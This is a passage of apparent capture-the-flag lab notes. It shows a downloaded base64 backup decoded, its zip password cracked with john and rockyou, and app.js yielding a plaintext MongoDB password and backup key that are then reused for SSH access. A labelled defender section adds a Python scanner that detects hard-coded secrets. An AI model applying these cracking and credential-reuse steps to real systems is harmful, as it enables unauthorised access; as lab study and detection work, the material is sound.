3 :3000 login

# there is a backup file we can download as admin

$ file myplace.backup
myplace.backup: ASCII text, with very long lines, with CRLF line terminators
# looks like a long base64 string

$ cat myplace.backup | base64 -d > myplace.backup_decoded
$ file myplace.backup_decoded
myplace.backup.b64: Zip archive data, at least v1.0 to extract

# naming it properly
$ mv myplace.backup_decoded myplace.zip

# it's password-protected, cracking the hash (saved as ziphash) with john
$ john --wordlist=/usr/share/wordlists/rockyou.txt ziphash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
magicword        (myplace.zip)
1g 0:00:00:00 DONE (2021-09-21 10:46) 100.0g/s 19660Kp/s 19660Kc/s 19660KC/s sandrea..piggy!
Use the "--show" option to display all of the cracked passwords reliably
Session completed

# unzip successful
file: /var/www/myplace/app.js
[truncated]
const url         = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
const backup_key  = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';

# ssh works for mark
mark@node:~$ whoami;id;hostname;uname -a
mark
uid=1001(mark) gid=1001(mark) groups=1001(mark)
node
Linux node 4.4.0-93-generic #116-Ubuntu SMP Fri Aug 11 21:17:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
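
The finding above is a database URI with an embedded password and a hard-coded backup_key in app.js, shipped inside a downloadable backup. A defender-side check for that pattern follows as an added example, not part of the original notes. The function names, rule names and the sample source are assumptions constructed for illustration, and the scanner redacts values so the report does not leak them.

```python
import re

# scheme://user:password@host : credentials embedded in a connection URI
URI_CREDS = re.compile(
    r"\b([a-z][a-z0-9+.-]*)://([^\s:/@'\"]+):([^\s@'\"]+)@([^\s/'\"?]+)", re.I)
# const/let/var NAME = '...' where NAME hints at a secret and the value is 16+ chars
NAMED_SECRET = re.compile(
    r"\b(?:const|let|var)\s+(\w*(?:key|secret|token|passw)\w*)\s*=\s*(['\"])([^'\"]{16,})\2",
    re.I)


def redact(value):
    """Keep the first two characters so a finding is recognisable but not reusable."""
    return value[:2] + "*" * (len(value) - 2)


def scan_source(text, path="<memory>"):
    """Return one finding per hard-coded credential found in JavaScript source text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in URI_CREDS.finditer(line):
            scheme, user, password, host = m.groups()
            findings.append({"path": path, "line": lineno, "rule": "uri-credentials",
                             "detail": f"{scheme}://{user}:{redact(password)}@{host}"})
        for m in NAMED_SECRET.finditer(line):
            name, _quote, value = m.groups()
            findings.append({"path": path, "line": lineno, "rule": "named-secret",
                             "detail": f"{name} = {redact(value)}"})
    return findings


# Constructed sample (placeholder values, not the ones from the backup).
# Line 4 is a URL with a port but no credentials and must not be reported.
SAMPLE = """\
const express = require('express');
const url         = 'mongodb://appuser:EXAMPLE-Passw0rd@localhost:27017/appdb?authSource=appdb';
const backup_key  = '0123456789abcdef0123456789abcdef';
const api = 'http://localhost:3000/api';
"""

if __name__ == "__main__":
    for f in scan_source(SAMPLE, "app.js"):
        print(f"{f['path']}:{f['line']}: {f['rule']}: {f['detail']}")
```

Running a check like this over a repository and over anything placed in a web-reachable backup catches this kind of secret before it ships; a secret that was already exposed still has to be rotated.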
